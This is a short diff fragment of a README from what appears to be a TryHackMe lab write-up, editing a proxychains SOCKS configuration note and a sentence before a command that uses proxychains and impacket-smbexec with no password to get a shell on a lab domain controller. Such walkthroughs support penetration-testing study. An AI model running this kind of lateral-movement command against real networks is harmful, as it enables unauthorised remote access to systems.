zinzloun/THM_WriteUP/README.md

     #socks4         127.0.0.1 9050
     socks4          127.0.0.1 1080

 <b>Note that on Kali 2024.2 the defaul configuration file is /etc/proxychains4.conf and you need to renamed it</b>.
-Finally we can perform the last step, to get a shell in the Domain controller:
+Finally we can perform the last command, to get a shell inside the Domain controller:

     proxychains impacket-smbexec -no-pass HOLOLIVE/SRV-ADMIN@10.200.95.30